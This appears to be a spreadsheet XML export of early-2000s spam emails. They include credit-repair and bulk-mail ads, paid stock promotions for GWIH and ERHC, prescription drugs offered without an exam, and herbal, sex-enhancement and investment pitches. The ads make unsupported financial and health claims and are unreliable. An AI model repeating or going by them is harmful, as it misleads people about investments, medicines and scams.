hand, get maximum exposure and be found on as many career
sites as possible.Just food for thought!Best Wishes,Elizabeth Bradley
Manager
elizibeth-bradley@allexecs.org========================================================The staff of AllExecs.org have years of recruiting
experience and may from time to time send you a
review of a career tool that has helped others in their
job search.  If you'd rather not receive these reviews,
reply to this note with "Remove" in the subject line.========================================================</t>
  </si>
  <si>
    <t xml:space="preserve">Is Your Credit A Mess?
Do you want Perfect Credit again?
Wouldn't it be nice to easily get loans for cars, boats, and houses?We have the Solution!! ONLINE CREDIT REPAIR!!!  Now you can clean up and repair your bad credit online from the convenience 
  of your home computer. Our program is 100% effective for helping you 
  fix your credit, and you can watch your credit with real-time updates.
Its been called the #1 program for fixing bad credit!Click 
  Here for FREE information Now!
Your 
  email address was obtained from a purchased list, Reference # 1010-11002.Â  
  If you wish to unsubscribe from this list, please Click 
  here and enter your name into the remove box. 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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}function MM_preloadImages() { //v3.0
 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
   var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i&lt;a.length; i++)
   if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}//--&gt;
Â 
Â 
To UNSUBSCRIBE 
  simply REPLY to this email with REMOVE 
  in the SUBJECT LINE
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
Promote 
        Your Product or Service to Millions Today! 
Â E-Mail 
        Marketing System
- 
        Bulk e-mail will make you money so fast, your head will spin!
        - Customers say "we would no longer be in business without it"
        - New package deal includes everything you need.
See this product's web page
Click 
        Here1 
        Million Business Leads on CD
- 
        For telemarketing, mailing, or faxing this list is a gold mine!
        - Contains company name, address, phone, fax, SIC, &amp; size.
        - List allows for unlimited use.
See this product's web page Click 
        HereFax 
        Marketing System
- 
        Fax broadcasting is the hot new way to market your business!
        - People are 10 times more likely to read faxes than direct mail.
        - Software &amp; 4 million leads turns your computer into a fax blaster.
See this product's web page Click 
        HereVisit 
        our Web Site or Call 618-288-6661
Â 
to be taken off of 
        our list click here </t>
  </si>
  <si>
    <t xml:space="preserve">    Do you have bad credit and want to have good credit?You can now access and clear up your credit online!Watch your credit improve daily with real time credit updateshttp://www.webcredit2002.com/?CID=1080&amp;MID=12600
</t>
  </si>
  <si>
    <t>**************************************BULKER CD**********************
************************MAY 22 2002*********************************************************************
**************************************************************************************************************HI ,  As a professional bulk mailer for 5 years. I made over $200,000 last 12 months selling only one product, "The Banned CD".Luckily for you, the 'Bulker CD 2003" is now for sale! I decide to sell all secrets how I made over $20,000 per month at home only few hours work.Why don't more people use Bulk Email Marketing?1.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</si>
  <si>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 xml:space="preserve">URGENT NOTICEPENDING MERGER TO INCREASE REVENUE 236%NOW IS THE TIME TO INVEST IN GWIHGWIH is rapidly expanding through acquisitions. In the 1st Quarter TWO mergers are in proces with a schedule to buy FOUR more profitable companies by the year end.GWIH plans to file for NASDAQ. Stock prices historically increase when listed on NASDAQ.
On May 30th, a year long Investor Relation and Public Awareness campaign will be launched to build shareholder equity. SEVERAL well-known stock pick newsletters, TV, radio and newsgroups will provide coverage on GWIH and it's acquisitions.All-Star Management Team with Advanced Degrees, Specialized Training, Proven Track Records and over 90 years Combined Experience. They are true Deal Makers, Executors and Closers.Put GWIH on your watch list,Â AQUIRE A POSTION IN GWIH TODAY !GWIH RECENT MERGERS and NEW BUSINESS DEVELOPMENTS:Acquired Bechler Cams, founded in 1957, specializes in precision high tolerance parts for aerospace, defense, medical, and surgical manufacturing sectors.CLICK FOR FULL STORYAcquired Nelson Engineering, BOEING CERTIFIED supplier of aerospace and defense parts was recently awarded contracts with Lockheed Martin and Boeing that will result in MAJOR production increases.CLICK FOR FULL STORYCLICK FOR QUOTE
To unsubscribe simply reply to this email for permanent removal.
Information within this advertisement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and has been paid 125,000 free trading shares of GWIH for this publication. SSA and/or its Affiliates or agents may at any time after receipt of compensation in Stock sell all or part of the stock received into the open market at the time of receipt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
  </si>
  <si>
    <t xml:space="preserve">ViaProexit list instructions
ajrule
</t>
  </si>
  <si>
    <t xml:space="preserve">Let Work From Home help you, our program has made more Millionaires than
any other home business opportunity in existance.
We have a proven 20 year track record and will help you succeed.If a former realtor
and former decorator(John and Susan Peterson)can quickly build residual checks like these...Â ...THEN SO CAN YOU!All you
have to do is follow the roadmap to success,with the AUTOMATED DIRECT DATA SYSTEM.CLICK HERE to begin your journey.If you do not desire to incur further suggestion from us, pleaseEnter here
</t>
  </si>
  <si>
    <t xml:space="preserve">JOB SEARCH 102&lt;!--
 p.MsoNormal
	{mso-style-parent:"";
	margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:"Times New Roman";
	margin-left:0in; margin-right:0in; margin-top:0in}
h2
	{margin-bottom:.0001pt;
	text-align:center;
	page-break-after:avoid;
	font-size:12.0pt;
	font-family:Helvetica;
	font-style:italic;
	text-decoration:underline;
	text-underline:single; margin-left:0in; margin-right:0in; margin-top:0in}
p.MsoBodyText
	{margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:Helvetica;
	font-weight:bold; margin-left:0in; margin-right:0in; margin-top:0in}
--&gt;Â 
JOB SEARCH 102
Â We have done all the research for you.Â Â 
Are you out of 
work?Â  Thinking about making a job change?Â  Having a hard time finding a good 
job?Â  
Â 
Jobs are hard to 
find.Â  Learning how to find them is not.Â  The more you know about how to find a 
job, the easier the search.Â  
JOB SEARCH 102: WHAT THEY DID NOT TEACH YOU IN
101 is your link to a new job.Â  Â 
There is much more!Â 
Find out why you are having a hard time finding a job and 
learn how to get the job you have been looking for.Â  This e-book will give you a 
genuine edge in todayÃ¿FFFF92s competitive job market.Â  You will get tons of practical 
advice on topics such as dealing with job loss, resume writing, networking 
techniques, interviewing and negotiating.Â  After you read this book, you will be 
better prepared to launch a successful job search campaign.
Â 
If you were laid 
off, pushed out of your last job on an early retirement program, or are simply 
dissatisfied with your current job and want to make a change, you will benefit 
from JOB SEARCH 102.Â  This book will truly assist you in your employment quest.Â Â 
We have done years 
of research on how to find jobs and we are giving you the results of our 
efforts.Â  So why wait?Â  Do not waste any more valuable time.Â  Do not delay.Â  Get 
going on your job search, start working and making money now.
Â CLICK HEREÂ 
to learn more about JOB SEARCH 102: WHAT THEY DID NOT 
TEACH YOU IN 101.
Â 
if you do not wish to receive our job search mailings, 
please CLICK HERE to unsubscribe 
from our mailing list.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Digital Authoring Tools : Featured Product AlertToday you had 100 Digital Web Books downloaded and within two weeks there are 600 circulating. 
Two months later you have 4000 in the marketplace. Tidal Wave or Viral Marketing is a wonder of our new society. See how major corporations have already embraced Digital Page Author.
 IMAGINE a tool that is very easy to learn yet will enable you to create brilliant, 3D, real-life, book-like, page-turning digital documents that you can distribute via the internet, store on web-sites and send on floppy or a cd-rom, complete with active web and email links!VIEW SAMPLES 
DOWNLOAD FREE SOFTWARE Digital Page Author enables companies and 
      individuals to produce their own professional looking catalogues, 
      brochures, photo albums, invitations and more--in-house--without the associated costs 
      of an outside design and/or print shop.Due to their extremly 
      small file size, Digital Web Books created with Digital Page Author can be 
      sent via email or quickly downloaded onto a PC. In minutes, a business can 
      create its own virtual catalogue in a format any Windows PC can display, 
      while ensuring the content cannot be copied by the 
  viewer. The optional Security Plugin provides  Virus Proof distribution including transport through firewalls.Â 
The Digital 
      Web Book format presents several opportunities, none more important than 
      the incredible pass-on ratio of each 
      brochure/publication.
Digital Web 
      Books are extremely small in file size, present a familiar navigation 
      system and can be used to attract new members. 
Why are 
      people attracted to Digital Web Books?  It's the look and feel of a 
      traditional brochure that captures the imagination of the end user. There 
      are several page transition choices, but the 3D page-turns really stand out.
Possible UsesCatalogues - Flyers - 
      Brochures - Annual Reports - Photo Albums - Newsletters - Media Kits - 
      Work Portfolios - Corporate Presentations - Manuals - Books - Magazines - 
      Novels Newspapers - Sales Presentations - Marketing Collateral - Intranet 
      Publications - Restaurant Menus - Educational Materials - Reference 
      Materials - Email promotions - Corporate / Product Profiles - Guides - 
      Reports - Briefs - Directories - and much, much more!Digital Page Author 
            Features
Produce 3D page-turning digital catalogues, manuals, 
            photo albums, etc.
A 
            universally understood format.
WSIWYG page creation and editing. 
Cut 
            and paste feature, internal image manipulator, hotlink to pages, web 
            sites, email and even other files. 
Set 
            auto page turn for trade show or in-store 
presentations.
Digital Web Book file sizes are small and easily distributed by 
            email, download or on floppy/CD. 
No 
            browser required--no downloading of software or plug-ins. 
Pages 
            fit your desktop screen--no scrolling required. Specify one of 6 
            page transitions: fly, turn, wipe, slide. Printable pages. 
Suitable for all Windows-based PCs, but currently non-Mac 
            compatible.Benefits
Fast 
            to learn and easy to use, the Net Book Author interface is designed 
            with the average PC user in mind. 
Saves 
            printing and distribution costs associated with print media. 
No 
            scrolling to view each page within PC screen--turns pages like a 
            real Book.
Easy 
            to distribute: via the Web, email, floppy or CD-ROM. 
Easily passed on by email. 
Recipients of the Book can store, view and interact with its 
            content off-line. 
Drives traffic to your web site. 
Encourages customer loyalty/repeat purchases. Permanent information is 
      read-only.
System and Software Requirements Windows 95, 98, 
      ME, NT 4.0, 2000, XPCurrently Not Mac CompatableHardware 
      Requirements (minimum recommended)300 MHz processor or faster64 MB 
      RAM8 MB Video Graphics Adapter20 MB free disk 
      spaceOther Requirements Internet connection 
      for product registration
Click here to 
      unsubscribe
Download FREE Evaluation | 
      Download Sample | BUY NOW!
If you have trouble downloading the FREE Software, please open this mail again soon to retry, as server demands are currently high for this limited time FREE Software offer.Copyright Â© 2002 - Reselling Partner ID# 1067 - *4 page limit3156bryQ4-819ISNs3103DAzp9-826XDxo9238Ndkx4-186ZPPL998l51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</si>
  <si>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http://www.freehostchina.com/washgh/
**************************************************
If you want to get removed
from our list please email at- standardoptout@x263.net (subject=remove "your email")
**************************************************
</t>
  </si>
  <si>
    <t>Low-Cost Term-Life Insurance!
SAVE up to 70% or more on your term life insurance policy now.
CLICK HERE NOW For your FREE Quote!
 http://hey11.heyyy.com/insurance/Example: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</si>
  <si>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it.referral-agent
</t>
  </si>
  <si>
    <t xml:space="preserve">We are desperately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these criteria, go to:                         livinghealthytoday@hotmail.com              and type in the Subject Line the following words:
                             "I do not want to work".              In fact, if you are so lazy that typing those words 
             in the Subject line is an effort, than don't bother.           Just click on the email and we'll know that you want 
     us to send you the domain name anyhow, because then 
              we will be absolutely certain that you are the 
                             kind of person we want.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this is the first 
                               and last email we will 
                                    ever send you.   
                                  That is a promise.                        So if nothing else, remember this -  
                    to make money without working for it just 
                      send an email with the following words 
                 in the subject line:  "I do not want to work" to:                             livinghealthytoday@hotmail.com 
                      and we will email you back with the 
                       website that gives you information 
                            on the best of both worlds - 
               a way to make money without having to work.                     We look forward to hearing from you.                     In all seriousness,                          Rick
This email ad is being sent in full compliance
with U.S. Senate Bill 1618, Title #3, Section 301****** to remove yourself send a blank email *****
****** ****to: removal495721@yahoo.com *** *****
mmxrxrxhfqlwfokhcb
</t>
  </si>
  <si>
    <t xml:space="preserve">
There are more financial opportunities out there than ever
before. The majority of those that succeed don't follow the
rules, they bend them, avoid them or go around them.Freedom 55 is for the suckers. You don't have to work 40 to
60 hours a week for 40 years all to make someone else wealthy.
We have a better way!Are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business.For more information about this incredible life changing
opportunity, please complete the form below. The information
is FREE, confidential and you are under no risk or obligations.
Name Â Â 
Address Â Â 
City Â Â 
State Â Â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WyomingZip Code Â Â 
Home Phone Â Â 
Time to Contact Â Â 
E-Mail Â Â 
Desired Monthly Income Â Â 
$500
$1000
$2500
$5000+
----------
To receive no further offers from our company regarding
this subject or any other, please reply to this
e-mail with the word 'Remove' in the subject line.st4t6p42
</t>
  </si>
  <si>
    <t>Vigoral AdVigoral Herbal Sex EnhancersDirect from
        the lab to you!We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
  </si>
  <si>
    <t xml:space="preserve">
Lowest Viagra Prices Online!
We are the largest U.S. Company specializing
in prescriptions for VIAGRA,
weight loss management and other FDA approved medications.Â 
It has never been easier to get Viagra.Â 
No Physical Exam Necessary!
Free online consultationFully confidentialNo embarassmentÂ No appointmentsSecure orderingÂ Discreet and overnight shippingÂ GUARANTEED
LOWEST PRICES.
BURN FAT AND LOSE WEIGHT FAST WITH
PHENTERMINE!
Click
here to visit our online pharmacy.
Â 
To be excluded from our mailing list, CLICK
HERE.Â  You will then be automatically deleted from future
mailings.Â 4992bjBX6-633aiSn5903nCZm6-773Sjjb9427YRYb1-371xFWB1146ehQR4-872LoOl63
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jlnax@yahoo.com
Human 
Growth 
Hormone 
TherapyLose 
weight while 
building 
lean 
muscle 
massand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subscriberto the 
Opt-In 
America 
Mailing 
List. 
To remove 
yourself from all related 
maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">Men's Health Update!
What if we could show you how to EFFECTIVELY add between 1" to 4.5" to your penis size without surgery, pumps, or other painful methods? Would you be willing to check it out and try all natural exercise techniques that could add MAJOR size to your penis? If you donÂ’t think you would like a larger, thicker, stronger penis youÂ’re definitely kidding yourself! Every man on the planet would like to increase his penis size, and we can show you how! CLICK HERE NOW!rnbda
</t>
  </si>
  <si>
    <t>IMPORTANT INFORMATION:The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38
1201HVlI9-661PJwl15</t>
  </si>
  <si>
    <t xml:space="preserve">
Merchant Account Secrets Revealed
ï¿½TURN BROWSERS INTO BUYERSï¿½
GET YOUR MERCHANT ACCOUNT TODAY!
Same Day Approvals 
VISA * MASTERCARD * AMERICAN EXPRESS * DISCOVER * ELECTRONIC CHECK
Â Click here to visit our website.
It takes less than a minute for you to complete the FREE request form for your merchant account.
Are you starting a business? Do you already have a business?
YOU CAN NOT COMPETE with out accepting credit cards or some sort of payment solution
we offer the best programs in the industry!
START MAKING MORE MONEY!
ONLINE, ON THE PHONE, IN YOUR STORE, IN YOUR SHOP,Â  
FROM YOUR OFFICE OR HOME 
RIGHT AWAY! 
Â Click Here for the Best Programs Available TODAY!
You may be paying to much for your existing merchant account. In just one minute you can complete the request form to receive a free statement analysis.
Â 
Â Â Â Â  Â  DON'T WAIT ANOTHER DAY! 
Â INCREASE YOUR SALES BY AS MUCH AS 1000%
----Save the Planet, Save the Trees! Advertise via E-mail.No wasted paper!DELETE WITH ONE SIMPLE KEYSTROKE!
Click Here To Be Removed.
</t>
  </si>
  <si>
    <t xml:space="preserve">ReliaQuote - Save Up To 70% On Life Insurance10-Year 
                  Level 
                  Term Life Insurance
Male/Female 
                  Monthly Premiums
                  No Nicotine
Â 
$250,000
$500,000
Age
Male
Female
Male
Female
35
$10.33
$9.19
$16.19
$14.00
40
$13.30
$11.64
$22.32
$18.82
45
$19.43
$16.63
$35.57
$22.88
50
$29.49
$22.32
$54.69
$40.25
55
$44.89
$32.12
$85.32
$59.94Â© 
              2002 ReliaQuote. All Rights Reserved 
Life 
                  can change in an instant. Don't wait until it's too late. Give 
                  your family the security they deserve today with affordable 
                  term life insurance from ReliaQuote.
To unsubscribe from our
mailing list, please Click
Here
</t>
  </si>
  <si>
    <t xml:space="preserve">==========================================================================================
THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301
TO REMOVE YOURSELF SEND A BLANK E-MAIL TO: removal992002@yahoo.com
THIS IS A FREE OFFER!
==========================================================================================
New Scientific Breakthru has taken (10 years) off
my face in (2 weeks). I was stunned by how fast this product
worked.
***Look 10-20 years younger in weeks! \\\***
Nature's answer to fast results for aging skin, stimulates
collagen formation, reduces cell damage from sun exposure
and protects against skin disorders.Quick and dramatic results for dark circles, wrinkles, age spots and
unhealthy cellulite.Developed by world renowned Dermatologist and comes with a
90 day money back guarantee, therefore you have nothing to lose.==========================================================================================
    If you are interested in receiving a FREE sample of an amzing product that is guaranteed to deliver quick and dramatic results for people interested in looking 10-20 years younger,then please take advantage of our free offer.We so much believe in our product that we are willing to invest in the costs of letting you try it for free!If you would like to try a FREE SAMPLE and and receive a FREE TAPE, then simply send a blank email with the words "SUBSCRIBE FOR FREE SAMPLE AND TAPE"  in the subject area to:     fountainofyouth101@yahoo.com***For faster delivery of your "FREE SAMPLE AND TAPE", please include the following information in your e-mail:Name:
Phone #:(optional)
E-Mail address:
Mailing Address:
===========================================================================================
You will be contacted with in 24 hours SO WE CAN VERIFY YOUR INFORMATION AND PROCESS YOUR FREE SAMPLE SHIPMENT.Thank you,
Health Associates, Int'l===========================================================================================ybsihxtsqawuwgu
</t>
  </si>
  <si>
    <t xml:space="preserve">
News IPOGEA
 Si 
        vous ne souhaitez plus recevoir ce courrier, cliquez 
        ici 
        Â    
01 
        44 54 32 82UN 
        MOIS DE MAINTENANCE OFFERT*
OUBLIEZ 
      VOS PROBLEMES INFORMATIQUES DU QUOTIDIEN 
        Â Â Â Â Â Â Â Ordinateurs bloquÃ©s, 
        Virus informatique, Perte de donnÃ©es, Connexion Internet 
        Â Â Â Â Â Â Â dÃ©fectueuse, Imprimante 
        dÃ©configurÃ©e, Serveur en panne â€¦ Votre entreprise 
        ne peut 
        Â Â Â Â Â Â Â plus rester bloquÃ©e 
        pendant plusieurs heures voire plusieurs jours.      PROFITEZ D'UN INFORMATICIEN A TEMPS PARTAGEÂ Â Â Â Â Â Â Votre 
            spï¿½cialiste informatique IPOGEA vous rend visite plusieurs fois par 
            mois 
            Â Â Â Â Â Â Â et assure une maintenance 
            adaptï¿½e de votre systï¿½me informatique. Vous bï¿½nï¿½ficiez 
            Â Â Â Â Â Â Â de l'assistance tï¿½lï¿½phonique 
            IPOGEA pour vous aider dans votre gestion quotidienne. 
            Â Â Â Â Â Â Â En cas d'urgence, les techniciens 
            IPOGEA interviennent dans les meilleurs dï¿½lais sur site.Â FAITES 
              DES ECONOMIES : 
Â Â Â GrÃ¢ce 
              Ã  IPOGEA, votre entreprise 
              Â Â Â se dote d'un vÃ©ritable service 
              Â Â Â informatique sans pour autant 
              Â Â Â supporter les coÃ»ts d'un 
              Â Â Â recrutement Ã  temps complet.
UN 
            REGARD OBJECTIF :  
Â Â Â IPOGEA 
            est indÃ©pendant des constructeurs 
            Â Â Â et des Ã©diteurs, ce qui vous garanti la 
            Â Â Â parfaite objectivitÃ© de nos conseils.
Â             DES TARIFS SANS SURPRISES : 
Â Â Â La 
            facturation de nos services 
            Â Â Â est mensuelle et forfaitaire.
Â 
TESTER 
            NOS SERVICES : 
Â Â Â Vous 
            pouvez tester nos services
            Â Â Â pendant 3 mois et rompre le 
            Â Â Â contrat Ã  tout moment pendant 
            Â Â Â cette pÃ©riode.Vous 
        souhaitez plus d'informations !Un conseiller vous appelle*pour 
          toute signature d'un contrat de 12 mois avant le 30/06/02
Si 
          vous ne souhaitez plus recevoir ce courrier, cliquez ici          Â   
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff â€œ1â€ &amp; â€œ2â€ â€œPersonal-Choiceâ€, pipe-smoking products/substances to the common market!!!  We are finally able to offer for your â€œSensitive/Responsiveâ€, â€œPersonal Choiceâ€ Smoking Enjoymentâ€¦.the â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Productâ€¦. Introduced after three years of research and development; Temple â€œ3â€ is â€œPersonal Choiceâ€ legal Smoking/Indulgenceâ€¦.Redefined!!!  Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offerâ€¦.in more cultivated/enhanced/viripotent/substantiated formatâ€¦.what had actually already been the most significant, lawful, â€œPersonal Choiceâ€ smoking substance available on the planetâ€¦.  â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) is the sweet, sweet evolution of all of thatâ€¦. * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE â€œ1â€ &amp; â€œ2â€).* HAPPIER, HAPPY SMOKING!!!* INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.* MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.* NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!* INHIBITS STRESS AND ANXIETYâ€¦.* INSPIRES CONTEMPLATIVENESS &amp; CREATIVITYâ€¦.* ENHANCES THE SEXUAL EXPERIENCE!!!* GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMINGâ€¦.*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WAYâ€¦.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).Temple â€œ3â€ Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-â€œSensitive/Responsiveâ€,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POTENT!!A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon â€œsensitive/responsiveâ€ herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple â€œ3â€ Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the â€œhappinessâ€ coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  Ingredients:Temple smoking substances and Temple â€œ3â€ Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES â€œHouse Smoking Substance Specialtiesâ€.  Temple â€œ3â€ Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) is an absolutely legal, herba/botanical, â€œPersonal Choiceâ€, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple â€œ3â€ Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple â€œ3â€ Ragga Dagga (TM)â€¦.  And although we are not age-governed by lawâ€¦.Temple â€œ3â€ Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple â€œ3â€ Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their timeâ€¦.  As well, Temple â€œ3â€ Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicianâ€™s care in any regard.========================================================
Here is what our customers are saying about the Temple â€œ3â€ Ragga Dagga (TM) phenomenon:â€œTo whom it may concern,I was skeptical when I first read your ad.  I grew up in the 70â€™s &amp; 80â€™s.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think?Sincerely,RJâ€Location: Midwest, U.S.A.â€œThank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you.â€-- Frankie R.Location: West Coast, USAâ€œIâ€™m a man of my 40â€™s and I really know my stuff.  I donâ€™t drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple â€œ3â€.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70â€™s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!â€  -- A.J.Location: United Kingdom
========================================================
Finally, we realize of course that this Temple â€œ3â€ Ragga Dagga (TM) is not inexpensiveâ€¦. (Temple â€œ3â€ Ragga Dagga (TM) is a very, very Sweet Smoke and â€œsweetnessâ€ is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craftâ€¦.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple â€œ3â€ Ragga Dagga (TM)â€¦. Four or five draws of your pipeâ€¦.as is the magical wayâ€¦.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple â€œ3â€ Ragga Dagga (TM) Package.)â€œSeventh Heavenâ€ Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) along with our other â€œvery fineâ€ â€œSensitive/Responsiveâ€ cordial botanical productsâ€¦. Please enjoy!!!  Many Blessings to you allâ€¦.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**************************************************ORDERING INFORMATION:
For your convenience, you can call us direct with your orders or questions.
Call 1-623-974-2295 
Monday - Friday -- 10:30 AM to 7:00 PM (Mountain Time)
Saturday -- 11:00 AM to 3:00 PM (Mountain Time)
For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.**************************************************SPECIAL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To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send. 
 </t>
  </si>
  <si>
    <t xml:space="preserve">
untitled
Get Your No Cost Mortgage Quotes HereLet The Banks Compete For Your Mortgage Loan.We Have Loans For Every Credit Situation!!.Click Here Now!
</t>
  </si>
  <si>
    <t xml:space="preserve">How would you like a 100% tax free Investment in Oil and Gas wells? 
Make over 100% annually and receive monthly tax free Income with 
very low risk. If you are liquid for a $10,000 investment, email your 
name, address, and phone number to 
oilandgaspackage@aol.com and we will send you the information=================================================================
To Unsubscribe from these special mailings:
 Forward this mail with "UNSUBSCRIBE" in the subject line to oilandgasremoval@aol.com
=================================================================fghludnbnobfmohbvmsojkdkkf
</t>
  </si>
  <si>
    <t xml:space="preserve">ironmandan
Explode Your Sex Life
All Natural Alternative!Men of Iron has been featured
on over 100 TV News and Top Radio stations across America, and we know
why...
It REALLY works!Buy Two Bottles and
Get One FREE
Formulated for Men
No Doctor Visit required!
No Prescription needed!
Not A Drug!
Click
Here to Visit Our Web Site
Iron Man Benefits:
Â· Number 1 formula for men
Â· Dramatically Enhances Organism
Â· No Negative Side Effects (All
Natural Ingredients). 
Â· Boosts Multiple Orgasms!
Â· Does Not Increase Blood Pressure! 
Â· Increases circulation in men
so erections become firmer. 
Â· Helps men with a sexual response
dysfunction, or  lack of 
  interest in sex. 
Â· Clears impotency problems. 
Â· Boosts Multiple Climaxes. 
Â· Relieves Emotional Ups Downs,
and Headaches!
Â· Helps Relieve Prostate Problems. 
Â· Lowers Cholesterol. 
Â· Very Affordable Price
Visit
Our Web Site Click Here:  Learn about our special offer!
</t>
  </si>
  <si>
    <t xml:space="preserve">
LOSE WEIGHT FASTÂ 
LOSE WEIGHT FAST, WITHOUT SPECIAL DIETS OR EXPENSIVE FOODS
                &amp; NO STARVING YOURSELF!        If you are tired of starvation diets, body wraps, fad diets, grueling exercise, or hypnosis to lose weight then you have just made the best choice of your life by
         reading this email!        We're not kidding, and as you will see we back it up with our LIFETIME MONEY-BACK GUARANTEE!
         NEW! EXTREME POWER PLUS        -Proven
        Weight Loss System- 
        For More Details or To Order Now Click our URL! http://LOSEweightFAST!/ad.html
Some Browsers do not
        accept hyperlinks, so if the above link does not work, cut &amp; paste
        it in your browser's url box. LIFETIME MONEY BACK GUARANTEE!It's almost to good to be true! Extreme Power Plus is here just in time! ORDER
        TODAY&amp; Get FREE SHIPPING*!!!Â CLICK
        HERE http://LOSEweightFAST!/ad.html
        As with all dietary supplements or exercise program, please consult your physician for their advice.
 *Note: On Orders of 3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 List</t>
  </si>
  <si>
    <t>ViaProexit
list instructions
pmoney</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</si>
  <si>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</si>
  <si>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SPECIAL SITUATION ALERTS HOT PICK OF THE YEAREnvironmental Remediation Holding Corp. (OTCBB: ERHC)URGENT BUY: $ .17SELL TARGET: $1.25INVESTOR ALERT: ERHC enters into joint-venture license agreement
with SCHLUMBERGER LTD (NYSE: SLB, $60) and BAKER HUGHES, INC.
(NYSE: BHI, $40) for seismic data on some of the richest offshore
oil blocks where ERHC controls a huge working interest!INVESTORS - WE HAVE FOUND THE HIDDEN GEM: (OTCBB: ERHC)!ERHC's joint-venture with SCHLUMBERGER and BAKER HUGHES puts them in
world-class company with these leaders in oil exploration and reservoir
imaging services.  The involvement of SLB and BHI reinforces the
$MULTI-BILLION DOLLAR VALUE that has been placed in this offshore
drilling haven.  ERHC's goal is to maximize shareholder value from
existing contractual rights, making them a significant player in
this region.THE BIG MONEY ROLLS IN:The seismic data from this joint-venture is being made available for
further involvement by the LARGEST OIL COMPANIES IN THE WORLD over
the next 2 weeks!!
Bidding wars have already developed between major oil companies suchas:
SHELL, CHEVRON/TEXACO, CONOCO, EXXON/MOBIL, PHILIPS, and MARATHON who
are willing to pay $Hundreds of Millions to drill in these zones and
partner with ERHC.STOCK SET TO EXPLODE ON EARNINGS BOOM:ERHC's exclusive right to participate in exploration and production
along with OIL INDUSTRY GIANTS could be worth up to $FIFTY MILLION
as these oil blocks are adjacent to Billion Barrel producing regions!SPECIAL SITUATION ALERTS' newsletter offers valuable research that
builds your wealth.  We target serious gains for serious investors
with a 700% investment return on ERHC.
DISCLAIMER: Certain statements contained in this newsletter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$10,000 by a third party for the electronic dissemination of
this company information. Be advised that investments in companies 
profiled are considered to be high-risk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investor's sole risk.
Be advised that the purchase of such high-risk securities may resultin 
the loss of some or all of the investment. The publisher of this 
newsletter makes no warranties or guarantees as to the accuracy or the
completeness of the disclosure. Investors should not rely solely on the
information presented. Rather, investors should use the information 
provided in this newsletter as a starting point for doing additional
independent research on the profiled companies in order to allow the
investor to form their own opinion regarding investing in the profiled
companies. Factual statements made about the profiled companies are made
as of the date stated and are subject to change without notice. 
Investing in micro-cap securities is highly speculative and carries an
extremely high degree of risk.
</t>
  </si>
  <si>
    <t>&lt;&lt;&lt; SPECIAL REVISED PRICE AS OF 5/24/2002 - HURRY QUANITIES WILL BE LIMITED &gt;&gt;&gt;
